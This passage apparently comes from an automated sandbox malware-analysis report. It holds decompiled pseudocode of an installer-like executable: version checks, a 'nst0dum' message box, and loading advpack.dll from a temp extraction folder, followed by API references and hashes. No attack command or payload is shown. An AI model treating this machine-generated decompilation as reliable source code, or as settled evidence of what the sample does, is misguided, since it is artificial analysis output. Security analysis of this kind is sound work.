                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                    												_v420 =  &_v268;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t124;
                                                                                                                                                                                                    											if(_t124 == 0) {
                                                                                                                                                                                                    												_t135 = _v436;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t99 = _t124[0x30];
                                                                                                                                                                                                    												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                    												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                    												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                    													asm("sbb ebx, ebx");
                                                                                                                                                                                                    													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t115 = 0x104;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x178a38 & 0x00000001;
                                                                                                                                                                                                    											if(( *0x178a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    												L64:
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												_push(0x30);
                                                                                                                                                                                                    												_push(_v420);
                                                                                                                                                                                                    												_push("nst0dum");
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												__eflags = _t135;
                                                                                                                                                                                                    												if(_t135 == 0) {
                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												__eflags =  *_t135;
                                                                                                                                                                                                    												if( *_t135 == 0) {
                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												MessageBeep(0);
                                                                                                                                                                                                    												_t94 = E0017681F(_t115);
                                                                                                                                                                                                    												__eflags = _t94;
                                                                                                                                                                                                    												if(_t94 == 0) {
                                                                                                                                                                                                    													L57:
                                                                                                                                                                                                    													0x180030 = 0x30;
                                                                                                                                                                                                    													L58:
                                                                                                                                                                                                    													_t97 = MessageBoxA(0, _t135, "nst0dum", 0x00180030 | _t115);
                                                                                                                                                                                                    													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                    													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                    														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                    														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                    															goto L66;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														__eflags = _t97 - 1;
                                                                                                                                                                                                    														L62:
                                                                                                                                                                                                    														if(__eflags == 0) {
                                                                                                                                                                                                    															_t138 = 0;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L66;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													__eflags = _t97 - 6;
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t98 = E001767C9(_t124, _t124);
                                                                                                                                                                                                    												__eflags = _t98;
                                                                                                                                                                                                    												if(_t98 == 0) {
                                                                                                                                                                                                    													goto L57;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                    										if(_t138 == 0x54c) {
                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138;
                                                                                                                                                                                                    										if(_t138 == 0) {
                                                                                                                                                                                                    											goto L66;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t135 = 0;
                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L37:
                                                                                                                                                                                                    									_t129 = _v432;
                                                                                                                                                                                                    									__eflags = _t129[0x7c];
                                                                                                                                                                                                    									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t133 =  &_v268;
                                                                                                                                                                                                    									_t104 = E001728E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                    									__eflags = _t104;
                                                                                                                                                                                                    									if(_t104 != 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t135 = _v428;
                                                                                                                                                                                                    									_t133 = 0x54d;
                                                                                                                                                                                                    									_t138 = 0x54d;
                                                                                                                                                                                                    									goto L40;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							if(_t91 > 0) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 != 0) {
                                                                                                                                                                                                    								__eflags = _t91;
                                                                                                                                                                                                    								if(_t91 != 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								__eflags = _t135;
                                                                                                                                                                                                    								if(_t135 == 0) {
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t138 = 0x54c;
                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                    							if(_t91 != 0) {
                                                                                                                                                                                                    								_t131 = _v424;
                                                                                                                                                                                                    								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                    								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                    							_t109 = _v424;
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                    							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                    							_t135 =  &(_t135[1]);
                                                                                                                                                                                                    							_v428 = _t135;
                                                                                                                                                                                                    							_v420 = _t135;
                                                                                                                                                                                                    							__eflags = _t135 - 2;
                                                                                                                                                                                                    						} while (_t135 < 2);
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t77 == 1;
                                                                                                                                                                                                    					if(_t77 == 1) {
                                                                                                                                                                                                    						 *0x179a40 = _t119;
                                                                                                                                                                                                    						 *0x178184 = 1;
                                                                                                                                                                                                    						 *0x178180 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - 3;
                                                                                                                                                                                                    						if(_t133 > 3) {
                                                                                                                                                                                                    							__eflags = _t133 - 5;
                                                                                                                                                                                                    							if(_t133 < 5) {
                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t113 = 3;
                                                                                                                                                                                                    							_t119 = _t113;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t119 = 1;
                                                                                                                                                                                                    						_t114 = 3;
                                                                                                                                                                                                    						 *0x179a40 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - _t114;
                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0x178184 = _t135;
                                                                                                                                                                                                    							 *0x178180 = _t135;
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                    						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t138 = 0x4ca;
                                                                                                                                                                                                    					goto L44;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t138 = 0x4b4;
                                                                                                                                                                                                    					L44:
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					L65:
                                                                                                                                                                                                    					_t133 = _t138;
                                                                                                                                                                                                    					E001744B9(0, _t138);
                                                                                                                                                                                                    					L66:
                                                                                                                                                                                                    					return E00176CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





































                                                                                                                                                                                                    0x001736f9
                                                                                                                                                                                                    0x00173700
                                                                                                                                                                                                    0x0017370c
                                                                                                                                                                                                    0x00173716
                                                                                                                                                                                                    0x00173718
                                                                                                                                                                                                    0x0017371b
                                                                                                                                                                                                    0x00173721
                                                                                                                                                                                                    0x0017372b
                                                                                                                                                                                                    0x0017373d
                                                                                                                                                                                                    0x00173745
                                                                                                                                                                                                    0x00173746
                                                                                                                                                                                                    0x00173746
                                                                                                                                                                                                    0x00173749
                                                                                                                                                                                                    0x001737ab
                                                                                                                                                                                                    0x001737ad
                                                                                                                                                                                                    0x001737ae
                                                                                                                                                                                                    0x001737b3
                                                                                                                                                                                                    0x001737b8
                                                                                                                                                                                                    0x001737b8
                                                                                                                                                                                                    0x001737bf
                                                                                                                                                                                                    0x001737bf
                                                                                                                                                                                                    0x001737c5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001737cb
                                                                                                                                                                                                    0x001737cd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001737d5
                                                                                                                                                                                                    0x001737db
                                                                                                                                                                                                    0x001737e8
                                                                                                                                                                                                    0x001737ea
                                                                                                                                                                                                    0x001737ea
                                                                                                                                                                                                    0x001737ea
                                                                                                                                                                                                    0x001737f0
                                                                                                                                                                                                    0x001737f6
                                                                                                                                                                                                    0x00173805
                                                                                                                                                                                                    0x00173817
                                                                                                                                                                                                    0x0017382b
                                                                                                                                                                                                    0x00173830
                                                                                                                                                                                                    0x00173836
                                                                                                                                                                                                    0x0017383b
                                                                                                                                                                                                    0x0017383d
                                                                                                                                                                                                    0x001738eb
                                                                                                                                                                                                    0x001738eb
                                                                                                                                                                                                    0x001738f2
                                                                                                                                                                                                    0x0017390c
                                                                                                                                                                                                    0x00173911
                                                                                                                                                                                                    0x00173911
                                                                                                                                                                                                    0x00173913
                                                                                                                                                                                                    0x0017394d
                                                                                                                                                                                                    0x0017394d
                                                                                                                                                                                                    0x0017394f
                                                                                                                                                                                                    0x001738a9
                                                                                                                                                                                                    0x001738a9
                                                                                                                                                                                                    0x001738b0
                                                                                                                                                                                                    0x001738b2
                                                                                                                                                                                                    0x001738b9
                                                                                                                                                                                                    0x001738bb
                                                                                                                                                                                                    0x001738c1
                                                                                                                                                                                                    0x00173975
                                                                                                                                                                                                    0x001738c7
                                                                                                                                                                                                    0x001738de
                                                                                                                                                                                                    0x001738e0
                                                                                                                                                                                                    0x001738e0
                                                                                                                                                                                                    0x0017397b
                                                                                                                                                                                                    0x0017397d
                                                                                                                                                                                                    0x001739a9
                                                                                                                                                                                                    0x0017397f
                                                                                                                                                                                                    0x00173982
                                                                                                                                                                                                    0x0017398b
                                                                                                                                                                                                    0x0017398d
                                                                                                                                                                                                    0x0017398f
                                                                                                                                                                                                    0x0017399f
                                                                                                                                                                                                    0x001739a1
                                                                                                                                                                                                    0x00173991
                                                                                                                                                                                                    0x00173991
                                                                                                                                                                                                    0x00173991
                                                                                                                                                                                                    0x0017398f
                                                                                                                                                                                                    0x001739af
                                                                                                                                                                                                    0x001739b6
                                                                                                                                                                                                    0x00173a0f
                                                                                                                                                                                                    0x00173a0f
                                                                                                                                                                                                    0x00173a11
                                                                                                                                                                                                    0x00173a13
                                                                                                                                                                                                    0x00173a19
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001739b8
                                                                                                                                                                                                    0x001739b8
                                                                                                                                                                                                    0x001739ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001739bc
                                                                                                                                                                                                    0x001739bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001739c3
                                                                                                                                                                                                    0x001739c9
                                                                                                                                                                                                    0x001739ce
                                                                                                                                                                                                    0x001739d0
                                                                                                                                                                                                    0x001739e3
                                                                                                                                                                                                    0x001739e5
                                                                                                                                                                                                    0x001739e6
                                                                                                                                                                                                    0x001739f1
                                                                                                                                                                                                    0x001739f7
                                                                                                                                                                                                    0x001739fa
                                                                                                                                                                                                    0x00173a01
                                                                                                                                                                                                    0x00173a04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173a06
                                                                                                                                                                                                    0x00173a09
                                                                                                                                                                                                    0x00173a09
                                                                                                                                                                                                    0x00173a0b
                                                                                                                                                                                                    0x00173a0b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173a09
                                                                                                                                                                                                    0x001739fc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001739fc
                                                                                                                                                                                                    0x001739d3
                                                                                                                                                                                                    0x001739d8
                                                                                                                                                                                                    0x001739da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001739dc
                                                                                                                                                                                                    0x001739b6
                                                                                                                                                                                                    0x00173955
                                                                                                                                                                                                    0x0017395b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173961
                                                                                                                                                                                                    0x00173963
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173969
                                                                                                                                                                                                    0x00173969
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173969
                                                                                                                                                                                                    0x00173915
                                                                                                                                                                                                    0x00173915
                                                                                                                                                                                                    0x0017391b
                                                                                                                                                                                                    0x0017391f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017392d
                                                                                                                                                                                                    0x00173933
                                                                                                                                                                                                    0x00173938
                                                                                                                                                                                                    0x0017393a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173940
                                                                                                                                                                                                    0x00173946
                                                                                                                                                                                                    0x0017394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001738f2
                                                                                                                                                                                                    0x00173843
                                                                                                                                                                                                    0x00173845
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017384b
                                                                                                                                                                                                    0x0017384d
                                                                                                                                                                                                    0x00173883
                                                                                                                                                                                                    0x00173885
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017389a
                                                                                                                                                                                                    0x0017389e
                                                                                                                                                                                                    0x0017389e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001738a0
                                                                                                                                                                                                    0x001738a0
                                                                                                                                                                                                    0x001738a2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001738a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001738a4
                                                                                                                                                                                                    0x0017384f
                                                                                                                                                                                                    0x00173851
                                                                                                                                                                                                    0x00173857
                                                                                                                                                                                                    0x0017386e
                                                                                                                                                                                                    0x00173877
                                                                                                                                                                                                    0x0017387b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173881
                                                                                                                                                                                                    0x00173859
                                                                                                                                                                                                    0x0017385c
                                                                                                                                                                                                    0x00173862
                                                                                                                                                                                                    0x00173866
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173868
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001738f4
                                                                                                                                                                                                    0x001738f4
                                                                                                                                                                                                    0x001738f5
                                                                                                                                                                                                    0x001738fb
                                                                                                                                                                                                    0x00173901
                                                                                                                                                                                                    0x00173901
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017390a
                                                                                                                                                                                                    0x0017374b
                                                                                                                                                                                                    0x0017374e
                                                                                                                                                                                                    0x0017375c
                                                                                                                                                                                                    0x00173764
                                                                                                                                                                                                    0x00173769
                                                                                                                                                                                                    0x0017376e
                                                                                                                                                                                                    0x00173771
                                                                                                                                                                                                    0x0017379c
                                                                                                                                                                                                    0x0017379f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001737a3
                                                                                                                                                                                                    0x001737a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001737a4
                                                                                                                                                                                                    0x00173773
                                                                                                                                                                                                    0x00173777
                                                                                                                                                                                                    0x00173778
                                                                                                                                                                                                    0x0017377f
                                                                                                                                                                                                    0x00173781
                                                                                                                                                                                                    0x0017378e
                                                                                                                                                                                                    0x0017378e
                                                                                                                                                                                                    0x00173794
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173794
                                                                                                                                                                                                    0x00173783
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173785
                                                                                                                                                                                                    0x0017378c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017378c
                                                                                                                                                                                                    0x00173750
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017372d
                                                                                                                                                                                                    0x0017372d
                                                                                                                                                                                                    0x0017396b
                                                                                                                                                                                                    0x0017396b
                                                                                                                                                                                                    0x0017396c
                                                                                                                                                                                                    0x0017396e
                                                                                                                                                                                                    0x0017396f
                                                                                                                                                                                                    0x00173a1e
                                                                                                                                                                                                    0x00173a1e
                                                                                                                                                                                                    0x00173a22
                                                                                                                                                                                                    0x00173a27
                                                                                                                                                                                                    0x00173a3e
                                                                                                                                                                                                    0x00173a3e

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00173723
                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 001739C3
                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,00000000,nst0dum,00000030), ref: 001739F1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$BeepVersion
                                                                                                                                                                                                    • String ID: 3$nst0dum
                                                                                                                                                                                                    • API String ID: 2519184315-140149190
                                                                                                                                                                                                    • Opcode ID: f0e086f86946674f7a497d195a9ecbf012efe3e6c8ae087425a24f0e04e6ee45
                                                                                                                                                                                                    • Instruction ID: b67458759c6941da9fb81336371b3afc6f1b79adeee7e8c19a801e07e2ef974b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0e086f86946674f7a497d195a9ecbf012efe3e6c8ae087425a24f0e04e6ee45
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B91D4B1A412249FEB398F14CC81BAAB7B1AB85304F1581A9D9ADDB251D7708FC1EB41
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                    			E00176495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed char _t14;
                                                                                                                                                                                                    				struct HINSTANCE__* _t15;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				CHAR* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t27 = __esi;
                                                                                                                                                                                                    				_t18 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				E00171781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                    				_t26 = "advpack.dll";
                                                                                                                                                                                                    				E0017658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                    				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                    					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x00176495
                                                                                                                                                                                                    0x00176495
                                                                                                                                                                                                    0x001764a0
                                                                                                                                                                                                    0x001764a7
                                                                                                                                                                                                    0x001764ab
                                                                                                                                                                                                    0x001764bd
                                                                                                                                                                                                    0x001764c2
                                                                                                                                                                                                    0x001764d3
                                                                                                                                                                                                    0x001764df
                                                                                                                                                                                                    0x001764e8
                                                                                                                                                                                                    0x00176502
                                                                                                                                                                                                    0x001764ee
                                                                                                                                                                                                    0x001764f9
                                                                                                                                                                                                    0x001764f9
                                                                                                                                                                                                    0x00176516

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 001764DF
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 001764F9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00176502
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                    • API String ID: 438848745-258089097
                                                                                                                                                                                                    • Opcode ID: 8285b38b930573bb2601259ec386b7bedd68de89d04f3cc267f1c8fd9046b109
                                                                                                                                                                                                    • Instruction ID: 0ada24424b08d285367678ca8acddb41b0eb2e47a30121f21239b55fdb8734cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8285b38b930573bb2601259ec386b7bedd68de89d04f3cc267f1c8fd9046b109
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D101F430A40108ABDB14EB74DC49EEE7778EFA4311F904195F58D925C0DF709ECACA51
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001728E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				char* _v12;
                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                    				long _t68;
                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                    				intOrPtr _t97;
                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v12 = __edx;
                                                                                                                                                                                                    				_t99 = __ecx;
                                                                                                                                                                                                    				_t106 = 0;
                                                                                                                                                                                                    				_v16 = __ecx;
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				_t103 = 0;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    					_t106 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t62 = 0;
                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                    						if(E00172773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                    						_v28 = _t68;
                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                    							_t99 = _v16;
                                                                                                                                                                                                    							_t70 = _v8 + _t99;
                                                                                                                                                                                                    							_t93 = _v24;
                                                                                                                                                                                                    							_t87 = _v20;
                                                                                                                                                                                                    							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                    							if(_t103 != 0) {
                                                                                                                                                                                                    								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                    								_v36 = _t73;
                                                                                                                                                                                                    								if(_t73 != 0) {
